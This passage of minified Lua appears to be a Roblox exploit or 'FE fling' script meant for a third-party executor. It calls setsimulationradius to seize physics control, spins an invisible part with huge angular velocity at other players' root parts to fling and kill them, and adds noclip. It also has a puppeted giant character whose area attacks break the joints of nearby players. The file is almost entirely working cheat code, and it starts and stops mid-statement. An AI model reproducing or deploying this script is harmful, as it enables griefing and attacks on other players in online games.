brug=true;brumom=true;brumom=false;bbav=Instance.new("BodyAngularVelocity",pewhandle)bbav.MaxTorque=Vector3.new(math.huge,math.huge,math.huge)bbav.P=1000000000000000000000000000;bbav.AngularVelocity=Vector3.new(10000000000000000000000000000000,100000000000000000000000000,100000000000000000)if game:GetService("Players"):GetPlayerFromCharacter(mouse.Target.Parent)then repeat game:GetService("RunService").RenderStepped:Wait()pewhandle.Position=mouse.Target.Parent.HumanoidRootPart.CFrame.p;wait(bruhmoment)until crackers.Humanoid.Health==100 or crackers.Humanoid.Health==0 elseif game:GetService("Players"):GetPlayerFromCharacter(mouse.Target.Parent.Parent)then repeat game:GetService("RunService").RenderStepped:Wait()pewhandle.Position=mouse.Target.Parent.Parent.HumanoidRootPart.CFrame.p;wait(bruhmoment)until crackers.Humanoid.Health==100 or crackers.Humanoid.Health==0 else end end end)crackers.Humanoid.Died:Connect(function()dead=true end)repeat game:GetService("RunService").RenderStepped:Wait()if dead==false and pewhandle.CanCollide==true then pewhandle.CanCollide=false end;if brug==true and dead==false then pewhandle.CFrame=crackers.Head.CFrame+Vector3.new(0,-15,0)elseif brumom==true and dead==false then pewhandle.CFrame=ghandle.CFrame*CFrame.new(-1.7,-2,0)pewhandle.Rotation=crackers.HumanoidRootPart.Rotation end until crackers.Humanoid.Health==0 end))spawn(function()while true do wait()setsimulationradius(math.huge,math.huge)end end)local i3=false;local function i4()if i3==false and game:GetService("Players").LocalPlayer.Character~=nil then for U,i5 in pairs(game:GetService("Players").LocalPlayer.Character:GetDescendants())do if i5:IsA("BasePart")and i5.CanCollide==true then i5.CanCollide=false end end end end;Noclipping=game:GetService('RunService').Stepped:connect(i4)local RA=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Right Arm")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("RightUpperArm")local LA=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Left Arm")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("LeftUpperArm")local RL=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Right Leg")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("RightUpperLeg")local LL=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Left Leg")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("LeftUpperLeg")local i6=workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Torso")or workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("UpperTorso")if workspace[game:GetService("Players").LocalPlayer.Name].Humanoid.RigType==Enum.HumanoidRigType.R15 then workspace[game:GetService("Players").LocalPlayer.Name].RightUpperArm["RightShoulder"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].LeftUpperArm["LeftShoulder"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].LeftUpperLeg["LeftHip"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].RightUpperLeg["RightHip"]:Destroy()else workspace[game:GetService("Players").LocalPlayer.Name].Torso["Right Shoulder"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].Torso["Left Shoulder"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].Torso["Right Hip"]:Destroy()workspace[game:GetService("Players").LocalPlayer.Name].Torso["Left Hip"]:Destroy()end;local i7=game:GetObjects("rbxassetid://5508993607")[1]i7.Parent=workspace[game:GetService("Players").LocalPlayer.Name]i7.Name="BIGBOI"alignPosition=Instance.new("AlignPosition",RA)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",RA)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;alignPosition=Instance.new("AlignPosition",LA)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",LA)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;alignPosition=Instance.new("AlignPosition",LL)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",LL)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;alignPosition=Instance.new("AlignPosition",RL)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",RL)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;alignPosition=Instance.new("AlignPosition",i6)alignPosition.RigidityEnabled=false;alignPosition.ApplyAtCenterOfMass=false;alignPosition.MaxForce=9e9;alignPosition.MaxVelocity=9e99;alignPosition.ReactionForceEnabled=false;alignPosition.Responsiveness=9e99;alignOr=Instance.new("AlignOrientation",i6)alignOr.MaxTorque=9e99;alignOr.MaxAngularVelocity=9e99;alignOr.PrimaryAxisOnly=false;alignOr.ReactionTorqueEnabled=false;alignOr.Responsiveness=200;alignOr.RigidityEnabled=false;a0=Instance.new("Attachment",RA)a1=Instance.new("Attachment",i7["Right Arm"])a2=Instance.new("Attachment",RA)RA.AlignPosition.Attachment0=a0;RA.AlignPosition.Attachment1=a1;RA.AlignOrientation.Attachment0=a2;RA.AlignOrientation.Attachment1=a1;a0=Instance.new("Attachment",LA)a1=Instance.new("Attachment",i7["Left Arm"])a2=Instance.new("Attachment",LA)LA.AlignPosition.Attachment0=a0;LA.AlignPosition.Attachment1=a1;LA.AlignOrientation.Attachment0=a2;LA.AlignOrientation.Attachment1=a1;a0=Instance.new("Attachment",RL)a1=Instance.new("Attachment",i7["Right Leg"])a2=Instance.new("Attachment",RL)RL.AlignPosition.Attachment0=a0;RL.AlignPosition.Attachment1=a1;RL.AlignOrientation.Attachment0=a2;RL.AlignOrientation.Attachment1=a1;a0=Instance.new("Attachment",LL)a1=Instance.new("Attachment",i7["Left Leg"])a2=Instance.new("Attachment",LL)LL.AlignPosition.Attachment0=a0;LL.AlignPosition.Attachment1=a1;LL.AlignOrientation.Attachment0=a2;LL.AlignOrientation.Attachment1=a1;a0=Instance.new("Attachment",i6)a1=Instance.new("Attachment",i7["Torso"])a2=Instance.new("Attachment",i6)i6.AlignPosition.Attachment0=a0;i6.AlignPosition.Attachment1=a1;i6.AlignOrientation.Attachment0=a2;i6.AlignOrientation.Attachment1=a1;RA.CFrame=CFrame.Angles(0,0,0)LA.CFrame=CFrame.Angles(0,0,0)i6.CFrame=CFrame.Angles(0,0,0)RL.CFrame=CFrame.Angles(0,0,0)LL.CFrame=CFrame.Angles(0,0,0)i7["Right Arm"].CFrame=CFrame.Angles(0,0,0)i7["Left Arm"].CFrame=CFrame.Angles(0,0,0)i7["Torso"].CFrame=CFrame.Angles(0,0,0)i7["Right Leg"].CFrame=CFrame.Angles(0,0,0)i7["Left Leg"].CFrame=CFrame.Angles(0,0,0)i7.HumanoidRootPart.Anchored=false;game:GetService("Workspace").CurrentCamera.CameraSubject=workspace[game:GetService("Players").LocalPlayer.Name].BIGBOI.Humanoid;spawn(function()while true do wait()if workspace[game:GetService("Players").LocalPlayer.Name]:FindFirstChild("Humanoid").Health==0 then workspace[game:GetService("Players").LocalPlayer.Name]:BreakJoints()i7:BreakJoints()end end end)function nocol(i8)for T,v in pairs(workspace[game:GetService("Players").LocalPlayer.Name]:GetDescendants())do if v:IsA("BasePart")then HILOL=Instance.new("NoCollisionConstraint",v)HILOL.Part0=v;HILOL.Part1=i8 end end end;for T,v in pairs(i7:GetDescendants())do if v:IsA("BasePart")then nocol(v)end end;game:GetService("Workspace").CurrentCamera.CameraSubject=i7.Humanoid;RA.Anchored=true;i6.Anchored=true;LA.Anchored=true;RL.Anchored=true;LL.Anchored=true;workspace[game:GetService("Players").LocalPlayer.Name].Head.Anchored=true;game:GetService("Workspace").CurrentCamera.CameraSubject=workspace[game:GetService("Players").LocalPlayer.Name].BIGBOI.Humanoid;game:GetService("Players").LocalPlayer.Character.Animate.Disabled=true;i7:MoveTo(game:GetService("Players").LocalPlayer.Character.Head.Position)game:GetService("UserInputService").JumpRequest:connect(function(i8)if i7.Humanoid.FloorMaterial~=Enum.Material.Air then i7.Humanoid.Jump=true end end)game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Anchored=true;if workspace[game:GetService("Players").LocalPlayer.Name].Humanoid.RigType==Enum.HumanoidRigType.R6 then workspace[game:GetService("Players").LocalPlayer.Name].HumanoidRootPart.RootJoint:Destroy()elseif workspace[game:GetService("Players").LocalPlayer.Name].Humanoid.RigType==Enum.HumanoidRigType.R15 then workspace[game:GetService("Players").LocalPlayer.Name].LowerTorso.Root:Destroy()end;Humanoid=game:GetService("Players").LocalPlayer.Character.Humanoid;game:GetService("RunService").RenderStepped:Connect(function()i7.Humanoid:Move(workspace[game:GetService("Players").LocalPlayer.Name].Humanoid.MoveDirection,false)end)spawn(function()local i9=Humanoid:GetPlayingAnimationTracks()for U,v in pairs(i9)do v:Stop()end end)RA.Anchored=false;i6.Anchored=false;LA.Anchored=false;RL.Anchored=false;LL.Anchored=false;workspace[game:GetService("Players").LocalPlayer.Name].Head.Anchored=false;wait(0.2)Player=game:GetService("Players").LocalPlayer;PlayerGui=Player.PlayerGui;Cam=workspace.CurrentCamera;Backpack=Player.Backpack;Character=Player.Character.BIGBOI;Humanoid=Character.Humanoid;Mouse=Player:GetMouse()RootPart=Character.HumanoidRootPart;Torso=Character.Torso;Head=Character.Head;RightArm=Character["Right Arm"]LeftArm=Character["Left Arm"]RightLeg=Character["Right Leg"]LeftLeg=Character["Left Leg"]RootJoint=RootPart.RootJoint;Neck=Torso.Neck;RightShoulder=Torso["Right Shoulder"]LeftShoulder=Torso["Left Shoulder"]RightHip=Torso["Right Hip"]LeftHip=Torso["Left Hip"]local mu=Instance.new("Sound",Character)IT=Instance.new;CF=CFrame.new;VT=Vector3.new;RAD=math.rad;C3=Color3.new;UD2=UDim2.new;BRICKC=BrickColor.new;ANGLES=CFrame.Angles;EULER=CFrame.fromEulerAnglesXYZ;COS=math.cos;ACOS=math.acos;SIN=math.sin;ASIN=math.asin;ABS=math.abs;MRANDOM=math.random;FLOOR=math.floor;Animation_Speed=3;Frame_Speed=0.016666666666666666;local l=16;local mv=CF(0,0,0)*ANGLES(RAD(-90),RAD(0),RAD(180))local mw=CF(0,1,0)*ANGLES(RAD(-90),RAD(0),RAD(180))local mx=CF(-0.5,0,0)*ANGLES(RAD(0),RAD(90),RAD(0))local my=CF(0.5,0,0)*ANGLES(RAD(0),RAD(-90),RAD(0))local mz=1;local mA="Idle"local mB=false;local mC=false;local mD=false;local mE=1;local mF=false;local mG=0;local mH=false;local mI=2/Animation_Speed;local mJ=false;local mK=false;local mL=false;local mM=IT("Animation")mM.Name="Roblox Idle Animation"mM.AnimationId="http://www.roblox.com/asset/?id=180435571"Character.Archivable=true;local mN=Character:Clone()mN.Parent=nil;RootPart2=mN.HumanoidRootPart;Torso2=mN.Torso;Head2=mN.Head;RightArm2=mN["Right Arm"]LeftArm2=mN["Left Arm"]RightLeg2=mN["Right Leg"]LeftLeg2=mN["Left Leg"]RootJoint2=RootPart2.RootJoint;Neck2=Torso2.Neck;RightShoulder2=Torso2["Right Shoulder"]LeftShoulder2=Torso2["Left Shoulder"]RightHip2=Torso2["Right Hip"]LeftHip2=Torso2["Left Hip"]mN.PrimaryPart=RootPart2;Character.Archivable=false;mN.Name="giantstando"local Effects=IT("Folder",Character)Effects.Name="Effects"local mO=Humanoid.Animator;local mP=Character.Animate;local mQ=true;local e3=528589078;local mR=1.32;local mS=true;local mT=false;function Raycast(mU,mV,mW,mX)return workspace:FindPartOnRay(Ray.new(mU,mV.unit*mW),mX)end;function PositiveAngle(eO)if eO>=0 then eO=0 end;return eO end;function NegativeAngle(eO)if eO<=0 then eO=0 end;return eO end;function Swait(eO)if eO==0 or eO==nil then game:GetService("RunService").Heartbeat:wait()else for T=1,eO do game:GetService("RunService").Heartbeat:wait()end end end;function CreateMesh(fs,ft,fu,fv,fw,fx,fy)local fz=IT(fs)if fs=="SpecialMesh"then fz.MeshType=fu;if fv~="nil"and fv~=""then fz.MeshId="http://www.roblox.com/asset/?id="..fv end;if fw~="nil"and fw~=""then fz.TextureId="http://www.roblox.com/asset/?id="..fw end end;fz.Offset=fy or VT(0,0,0)fz.Scale=fx;fz.Parent=ft;return fz end;function CreatePart(fA,ft,fB,fC,fD,fE,fF,fG,fH)local fI=IT("Part")fI.formFactor=fA;fI.Reflectance=fC;fI.Transparency=fD;fI.CanCollide=false;fI.Locked=true;fI.Anchored=true;if fH==false then fI.Anchored=false end;fI.BrickColor=BRICKC(tostring(fE))fI.Name=fF;fI.Size=fG;fI.Position=Torso.Position;fI.Material=fB;fI:BreakJoints()fI.Parent=ft;return fI end;local mY=function(a,b)local mZ=Instance.new("ManualWeld")mZ.Part0=a;mZ.Part1=b;mZ.C0=CFrame.new()mZ.C1=b.CFrame:inverse()*a.CFrame;mZ.Parent=a;return mZ end;function QuaternionFromCFrame(cf)local iy,iz,iA,iB,iC,iD,iE,iF,iG,iH,iI,iJ=cf:components()local iK=iB+iF+iJ;if iK>0 then local s=math.sqrt(1+iK)local iL=0.5/s;return(iI-iG)*iL,(iD-iH)*iL,(iE-iC)*iL,s*0.5 else local T=0;if iB(T==0 and iB or iF)then T=2 end;if T==0 then local s=math.sqrt(iB-iF-iJ+1)local iL=0.5/s;return 0.5*s,(iE+iC)*iL,(iH+iD)*iL,(iI-iG)*iL elseif T==1 then local s=math.sqrt(iF-iJ-iB+1)local iL=0.5/s;return(iC+iE)*iL,0.5*s,(iI+iG)*iL,(iD-iH)*iL elseif T==2 then local s=math.sqrt(iJ-iB-iF+1)local iL=0.5/s;return(iD+iH)*iL,(iG+iI)*iL,0.5*s,(iE-iC)*iL end end end;function QuaternionToCFrame(iM,iN,iO,x,iP,z,c4)local iQ,iR,iS=x+x,iP+iP,z+z;local iT,iU,iV=c4*iQ,c4*iR,c4*iS;local iW=x*iQ;local iX=x*iR;local iY=x*iS;local iZ=iP*iR;local i_=iP*iS;local j0=z*iS;return CFrame.new(iM,iN,iO,1-(iZ+j0),iX-iV,iY+iU,iX+iV,1-(iW+j0),i_-iT,iY-iU,i_+iT,1-(iW+iZ))end;function QuaternionSlerp(a,b,t)local j1=a[1]*b[1]+a[2]*b[2]+a[3]*b[3]+a[4]*b[4]local j2,j3;if j1>=1.0E-4 then if 1-j1>1.0E-4 then local j4=ACOS(j1)local j5=1/SIN(j4)j2=SIN((1-t)*j4)*j5;j3=SIN(t*j4)*j5 else j2=1-t;j3=t end elseif 1+j1>1.0E-4 then local j4=ACOS(-j1)local j5=1/SIN(j4)j2=SIN((t-1)*j4)*j5;j3=SIN(t*j4)*j5 else j2=t-1;j3=t end;return a[1]*j2+b[1]*j3,a[2]*j2+b[2]*j3,a[3]*j2+b[3]*j3,a[4]*j2+b[4]*j3 end;function Clerp(a,b,t)local io={QuaternionFromCFrame(a)}local ip={QuaternionFromCFrame(b)}local iq,ir,is=a.x,a.y,a.z;local iu,iv,iw=b.x,b.y,b.z;local ix=1-t;return QuaternionToCFrame(ix*iq+t*iu,ix*ir+t*iv,ix*is+t*iw,QuaternionSlerp(io,ip,t))end;function CreateFrame(ft,fD,m_,mU,fG,fX,n0,fF)local n1=IT("Frame")n1.BackgroundTransparency=fD;n1.BorderSizePixel=m_;n1.Position=mU;n1.Size=fG;n1.BackgroundColor3=fX;n1.BorderColor3=n0;n1.Name=fF;n1.Parent=ft;return n1 end;function CreateLabel(ft,n3,n4,n5,n6,fD,m_,n7,fF)local n8=IT("TextLabel")n8.BackgroundTransparency=1;n8.Size=UD2(1,0,1,0)n8.Position=UD2(0,0,0,0)n8.TextColor3=n4;n8.TextStrokeTransparency=n7;n8.TextTransparency=fD;n8.FontSize=n5;n8.Font=n6;n8.BorderSizePixel=m_;n8.TextScaled=false;n8.Text=n3;n8.Name=fF;n8.Parent=ft;return n8 end;function NoOutlines(n9)n9.TopSurface,n9.BottomSurface,n9.LeftSurface,n9.RightSurface,n9.FrontSurface,n9.BackSurface=10,10,10,10,10,10 end;function CreateWeldOrSnapOrMotor(fP,ft,na,nb,eo,ep)local nc=IT(fP)nc.Part0=na;nc.Part1=nb;nc.C0=eo;nc.C1=ep;nc.Parent=ft;return nc end;local dA=IT("Sound")function CreateSound(fJ,ft,fK,fL,fM)local fN;coroutine.resume(coroutine.create(function()fN=dA:Clone()fN.EmitterSize=fK*5;fN.Parent=ft;fN.Volume=fK;fN.Pitch=fL;fN.SoundId="http://www.roblox.com/asset/?id="..fJ;fN:play()if fM==true then fN.Looped=true else repeat wait(1)until fN.Playing==false;fN:remove()end end))return fN end;function CFrameFromTopBack(nd,ne,nf)local ng=ne:Cross(nf)return CF(nd.x,nd.y,nd.z,ng.x,ne.x,nf.x,ng.y,ne.y,nf.y,ng.z,ne.z,nf.z)end;function WACKYEFFECT(fO)local fP=fO.EffectType or"Sphere"local fG=fO.Size or VT(1,1,1)local fQ=fO.Size2 or VT(0,0,0)local fD=fO.Transparency or 0;local fR=fO.Transparency2 or 1;local fS=fO.CFrame or Torso.CFrame;local fT=fO.MoveToPos or nil;local fU=fO.RotationX or 0;local fV=fO.RotationY or 0;local fW=fO.RotationZ or 0;local fB=fO.Material or"Neon"local fX=fO.Color or C3(1,1,1)local fY=fO.Time or 45;local fZ=fO.SoundID or nil;local f_=fO.SoundPitch or nil;local g0=fO.SoundVolume or nil;coroutine.resume(coroutine.create(function()local g1=false;local g2;local g3=CreatePart(3,Effects,fB,0,fD,BRICKC("Pearl"),"Effect",VT(1,1,1),true)if fZ~=nil and f_~=nil and g0~=nil then g1=true;g2=CreateSound(fZ,g3,g0,f_,false)end;g3.Color=fX;local g4;if fP=="Sphere"then g4=CreateMesh("SpecialMesh",g3,"Sphere","","",fG,VT(0,0,0))elseif fP=="Block"or fP=="Box"then g4=IT("BlockMesh",g3)g4.Scale=fG elseif fP=="Wave"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","20329976","",fG,VT(0,0,-fG.X/8))elseif fP=="Ring"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","559831844","",VT(fG.X,fG.X,0.1),VT(0,0,0))elseif fP=="Slash"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","662586858","",VT(fG.X/10,0,fG.X/10),VT(0,0,0))elseif fP=="Round Slash"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","662585058","",VT(fG.X/10,0,fG.X/10),VT(0,0,0))elseif fP=="Swirl"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","1051557","",fG,VT(0,0,0))elseif fP=="Skull"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","4770583","",fG,VT(0,0,0))elseif fP=="Crystal"then g4=CreateMesh("SpecialMesh",g3,"FileMesh","9756362","",fG,VT(0,0,0))end;if g4~=nil then local g5;if fT~=nil then g5=(fS.p-fT).Magnitude/fY end;local g6=fG-fQ;local g7=fD-fR;if fP=="Block"then g3.CFrame=fS*ANGLES(RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)))else g3.CFrame=fS end;for g9=1,fY+1 do Swait()g4.Scale=g4.Scale-g6/fY;if fP=="Wave"then g4.Offset=VT(0,0,-g4.Scale.X/8)end;g3.Transparency=1;if fP=="Block"then g3.CFrame=fS*ANGLES(RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)),RAD(MRANDOM(0,360)))else g3.CFrame=g3.CFrame*ANGLES(RAD(fU),RAD(fV),RAD(fW))end;if fT~=nil then local g8=g3.Orientation;g3.CFrame=CF(g3.Position,fT)*CF(0,0,-g5)g3.Orientation=g8 end end;if g1==false then g3:remove()else repeat Swait()until g2.Playing==false;g3:remove()end elseif g1==false then g3:remove()else repeat Swait()until g2.Playing==false;g3:remove()end end))end;function MakeForm(n9,fP)if fP=="Cyl"then local g4=IT("CylinderMesh",n9)elseif fP=="Ball"then local g4=IT("SpecialMesh",n9)g4.MeshType="Sphere"elseif fP=="Wedge"then local g4=IT("SpecialMesh",n9)g4.MeshType="Wedge"end end;Debris=game:GetService("Debris")function CastProperRay(nh,ni,nj,eV)local mV=CF(nh,ni).lookVector;return Raycast(nh,mV,nj,eV)end;function GetRoot(nk,nl)if nl==true then return nk:FindFirstChild("HumanoidRootPart")or nk:FindFirstChild("Torso")or nk:FindFirstChild("UpperTorso")else return nk:FindFirstChild("Torso")or nk:FindFirstChild("UpperTorso")end end;function FacialShadow()local nm={}for T=1,16 do local nn=CreatePart(3,Effects,"Fabric",0,0+(T-1)/16.2,"Dark stone grey","FaceGradient",VT(1.01,0.65,1.01),false)nn.Color=C3(0,0,0)Head:FindFirstChildOfClass("SpecialMesh"):Clone().Parent=nn;CreateWeldOrSnapOrMotor("Weld",Head,Head,nn,CF(0,0.45-(T-1)/25,0),CF(0,0,0))table.insert(nm,nn)end;local function no()for T=1,#nm do nm[T]:remove()end end;return no end;function CreateFlyingDebree(FLOOR,mU,np,nq,nr,ns)if FLOOR~=nil then for T=1,np do do local nt=CreatePart(3,Effects,"Neon",FLOOR.Reflectance,FLOOR.Transparency,"Peal","Debree",nq,false)nt.Material=FLOOR.Material;nt.Color=FLOOR.Color;nt.CFrame=mU*ANGLES(RAD(MRANDOM(-360,360)),RAD(MRANDOM(-360,360)),RAD(MRANDOM(-360,360)))nt.Velocity=VT(MRANDOM(-ns,ns),MRANDOM(-ns,ns),MRANDOM(-ns,ns))coroutine.resume(coroutine.create(function()Swait(15)nt.Parent=workspace;nt.CanCollide=true;Debris:AddItem(nt,nr)end))end end end end;local fG=2;RootPart2.Size=RootPart.Size*fG;Torso2.Size=Torso.Size*fG;RightArm2.Size=RightArm.Size*fG;RightLeg2.Size=RightLeg.Size*fG;LeftArm2.Size=LeftArm.Size*fG;LeftLeg2.Size=LeftLeg.Size*fG;RootJoint2.C0=mv*CF(0*fG,0*fG,0*fG)*ANGLES(RAD(0),RAD(0),RAD(0))RootJoint2.C1=mv*CF(0*fG,0*fG,0*fG)*ANGLES(RAD(0),RAD(0),RAD(0))Neck2.C0=mw*CF(0*fG,0*fG,0+1*fG-1)*ANGLES(RAD(0),RAD(0),RAD(0))Neck2.C1=CF(0*fG,-0.5*fG,0*fG)*ANGLES(RAD(-90),RAD(0),RAD(180))RightShoulder2.C1=CF(0*fG,0.5*fG,-0.35*fG)LeftShoulder2.C1=CF(0*fG,0.5*fG,-0.35*fG)RightHip2.C0=CF(1*fG,-1*fG,0*fG)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0))LeftHip2.C0=CF(-1*fG,-1*fG,0*fG)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0))RightHip2.C1=CF(0.5*fG,1*fG,0*fG)*ANGLES(RAD(0),RAD(90),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0))LeftHip2.C1=CF(-0.5*fG,1*fG,0*fG)*ANGLES(RAD(0),RAD(-90),RAD(0))*ANGLES(RAD(0),RAD(0),RAD(0))Head2.Size=VT(1,1,1)*fG;RootJoint2.Parent=RootPart;Neck2.Parent=Torso;RightShoulder2.Parent=Torso;LeftShoulder2.Parent=Torso;RightHip2.Parent=Torso;LeftHip2.Parent=Torso;local nu=C3(1,1,1)local nv="Fantasy"local nw=6;local nx={"Z-Tremor Punch","E-Meteor Impact","R-Uppercut"}local ny={}function ApplyDamage(Humanoid,Damage)Damage=Damage*mz;if Humanoid.Health<2000 then if Humanoid.Health-Damage>0 then Humanoid.Health=Humanoid.Health-Damage else Humanoid.Parent:BreakJoints()end else Humanoid.Parent:BreakJoints()end end;function ApplyAoE(mU,mW,nz,nA,nB,nC)for nD,nE in pairs(workspace:GetDescendants())do if nE.ClassName=="Model"and nE~=Character then local nF=nE:FindFirstChildOfClass("Torso")if nF then local nG=nE:FindFirstChild("Torso")or nE:FindFirstChild("UpperTorso")if nG and mW>=(nG.Position-mU).Magnitude then if nC==true then nE:BreakJoints()else local nH=MRANDOM(nz,nA)ApplyDamage(nF,nH)end;if nB>0 then for U,c in pairs(nE:GetChildren())do if c:IsA("BasePart")then local bv=Instance.new("BodyVelocity")bv.maxForce=Vector3.new(1000000000,1000000000,1000000000)bv.velocity=CF(mU,nG.Position).lookVector*nB;bv.Parent=c;Debris:AddItem(bv,0.05)end end end end end end end end;function Intro()mC=true;mB=true;mF=true;if mF==false then Disable_Jump=false;Humanoid.WalkSpeed=l elseif mF==true then Disable_Jump=true;Humanoid.WalkSpeed=0 end;coroutine.resume(coroutine.create(function()repeat Swait()RootPart2.Anchored=true;for U,c in pairs(mN:GetChildren())do if c:IsA("Part")then c.Color=C3(1,1,1)if c~=RootPart2 then c.Transparency=1 end;if c:FindFirstChildOfClass("Decal")then c:ClearAllChildren()end;c.CanCollide=false;c.Material="Neon"else c:remove()end end;RootJoint.C0=Clerp(RootJoint.C0,mv*CF(0,0,0)*ANGLES(RAD(-5),RAD(0),RAD(-35)),1/Animation_Speed)Neck.C0=Clerp(Neck.C0,mw*CF(0,0,0)*ANGLES(RAD(0),RAD(0),RAD(35)),1/Animation_Speed)RightShoulder.C0=Clerp(RightShoulder.C0,CF(1.5,0.5,0)*ANGLES(RAD(-1),RAD(0),RAD(3))*mx,1/Animation_Speed)LeftShoulder.C0=Clerp(LeftShoulder.C0,CF(-1.5,0.5,0)*ANGLES(RAD(-1),RAD(0),RAD(-3))*my,1/Animation_Speed)RightHip.C0=Clerp(RightHip.C0,CF(1,-1,-0.01)*ANGLES(RAD(-12),RAD(80),RAD(0))*ANGLES(RAD(-2),RAD(0),RAD(0)),1/Animation_Speed)LeftHip.C0=Clerp(LeftHip.C0,CF(-1,-1,-0.01)*ANGLES(RAD(0),RAD(-60),RAD(0))*ANGLES(RAD(-2),RAD(0),RAD(0)),1/Animation_Speed)until mB==false end))wait(1)mN.Parent=Character;mN:SetPrimaryPartCFrame(RootPart.CFrame*CF(0,-20,5))local nI,nJ=Raycast(RootPart.CFrame*CF(0,0,5).p,CF(RootPart.Position,RootPart.Position+VT(0,-1,0)).lookVector,4,Character)for T=1,250 do Swait()mR=mR-0.0032;local nK=CF(nJ)*ANGLES(RAD(0),RAD(MRANDOM(0,360)),RAD(0))*CF(0,0,MRANDOM(2,18))local nL=MRANDOM(20,80)WACKYEFFECT({Time=nL,EffectType="Sphere",Size=VT(1,1,1),Size2=VT(0,45,0),Transparency=0,Transparency2=0,CFrame=nK,MoveToPos=nK.p+VT(0,MRANDOM(35,160),0),RotationX=0,RotationY=0,RotationZ=0,Material="Neon",Color=C3(1,1,1),SoundID=nil,SoundPitch=0.8,SoundVolume=5})RootPart2.CFrame=Clerp(RootPart2.CFrame,RootPart.CFrame*CF(0,6,5),0.01)RootJoint2.C0=Clerp(RootJoint2.C0,mv*CF(0,0,0)*ANGLES(RAD(-5),RAD(0),RAD(0)),1/Animation_Speed)Neck2.C0=Clerp(Neck2.C0,mw*CF(0,0,0+1*fG-1)*ANGLES(RAD(-25),RAD(0),RAD(0)),1/Animation_Speed)RightShoulder2.C0=Clerp(RightShoulder2.C0,CF(1.5*fG,0.5*fG,0)*ANGLES(RAD(-15),RAD(0),RAD(45))*mx,1/Animation_Speed)LeftShoulder2.C0=Clerp(LeftShoulder2.C0,CF(-1.5*fG,0.5*fG,0)*ANGLES(RAD(-15),RAD(0),RAD(-45))*my,1/Animation_Speed)RightHip2.C0=Clerp(RightHip2.C0,CF(1*fG,-0.7*fG,-0.5*fG)*ANGLES(RAD(-25),RAD(80),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)LeftHip2.C0=Clerp(LeftHip2.C0,CF(-1*fG,-0.7*fG,-0.5*fG)*ANGLES(RAD(-25),RAD(-80),RAD(0))*ANGLES(RAD(-1*SIN(mG/6)),RAD(0),RAD(0)),1/Animation_Speed)end;for T=0,0.6,0.1/Animation_Speed do 